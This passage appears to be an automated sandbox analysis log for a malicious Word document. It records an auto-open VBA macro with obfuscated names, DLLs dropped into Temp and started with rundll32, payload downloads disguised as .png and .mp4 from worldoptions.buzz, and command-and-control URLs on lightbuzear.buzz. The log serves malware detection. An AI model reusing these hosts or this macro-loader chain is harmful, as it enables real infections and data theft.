Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000005.00000002.1198794640.000000000300F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://com.lightbuzear.buzz/
Source: rundll32.exe, 00000005.00000002.1198802455.000000000301C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198575987.0000000000215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel
Source: rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel1ci
Source: rundll32.exe, 00000005.00000002.1198575987.0000000000215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torelEu
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6D74B366-D4C8-464E-A7CA-80C94D1A45EA}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: worldoptions.buzz
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4737230 LoadLibraryExW,GetProcAddress,ObtainUserAgentString,FreeLibrary,InternetOpenA,InternetConnectA,InternetCloseHandle,LoadLibraryW,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,GetProcAddress,GetProcAddress,HttpSendRequestA,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,FreeLibrary,CreateDirectoryW,FreeLibrary,std::ios_base::_Ios_base_dtor,GetModuleHandleA,GetProcAddress,InternetReadFile,wcsstr,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,FreeLibrary,std::ios_base::_Ios_base_dtor,
Source: global trafficHTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: worldoptions.buzzConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: worldoptions.buzzConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknownHTTPS traffic detected: 64.52.80.180:443 -> 192.168.2.22:49175 version: TLS 1.2

System Summary

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\wnitmpo.dllJump to dropped file
Source: template[1].docOLE, VBA macro line: Private Declare PtrSafe Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As LongPtr, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As LongPtr, ByVal jjIILJillJlIiIij As Long) As Long
Source: template[1].docOLE, VBA macro line: Private Declare Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As Long, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As Long, ByVal jjIILJillJlIiIij As Long) As Long
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As LongPtr, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As LongPtr, ByVal jjIILJillJlIiIij As Long) As Long
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE, VBA macro line: Private Declare Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar"(ByVal LilIilljllJjLjIl as Long, ByVal LiIJJjiLLILjLLiL as Long, ByVal IjJIjiljLjLLiIlI as Long, ByVal ljLLLJJilJJlIJLJ as Long, ByVal iLLiLJiiLJijIjjL as Long, ByVal jjIILJillJlIiIij as Long) as Long
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE, VBA macro line: JbxLog "win32:" & jbxline & ":IJIiLJIJlllJIjIJ" & ":kernel32!MultiByteToWideChar"
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF472BE90
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4726F10
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4725EE0
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4734F60
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF475A4B0
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF474679C
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4737230
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF475D380
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4756EBC
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4738F50
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF475000C
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4724FF0
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF475C92C
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4757994
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF47499F8
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF474AB7C
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4748C2C
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4745480
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4721470
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4733510
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4750630
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF47425E4
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF474967C
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF474B70C
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF47456F4
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4752744
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4751808
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF474A044
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF472B0C0
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4734190
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4722180
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4756160
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4749218
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4752394
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4721380
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF474C350
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF47223E0
Source: C:\Windows\System32\rundll32.exeCode function: String function: 000007FEF47589A8 appears 48 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 000007FEF4722D50 appears 51 times
Source: template[1].docOLE, VBA macro line: Sub DoCUmeNT_OPEn()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function DoCUmeNT_OPEn
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE, VBA macro line: Sub DoCUmeNT_OPEn()
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: template[1].docOLE indicator, VBA macros: true
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll A2BE0FE4CAFBCA698873FADCA25970FE24DF6FD9C2F0DA1E2DEC6561A2C33177
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\wnitmpo.dll 0E209D2DE485637DF53C20C8425FF3F20AF6E04A46697D80F459EC6CD36C58B7
Source: template[1].docVirustotal: Detection: 12%
Source: C:\Windows\System32\taskeng.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {42E32873-DCC3-405E-9458-A04BFDF9CD6F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
Source: template[1].LNK.0.drLNK file: ..\..\..\..\..\Desktop\template[1].doc
Source: template[1].docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$mplate[1].docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR61BE.tmpJump to behavior
Source: classification engineClassification label: mal100.expl.evad.winDOC@4/13@3/3
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4738F50 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysFreeString,_time64,wcsftime,_com_util::ConvertStringToBSTR,SysFreeString,SysFreeString,GetWindowsDirectoryW,SysFreeString,SysFreeString,CoUninitialize,SysAllocString,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
Source: template[1].docOLE document summary: title field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE document summary: title field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE document summary: author field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.drOLE document summary: edited time not present or 0
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: template[1].docInitial sample: OLE summary totaledittime = 403197
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: template[1].docStream path 'VBA/ThisDocument' : High number of string operations
Source: ~DF3EAF6279D3B942E8.TMP.0.drStream path 'VBA/ThisDocument' : High number of string operations
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF4738BC0 LoadLibraryW,GetProcAddress,FreeLibrary,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\wnitmpo.dllJump to dropped file
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF474679C EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
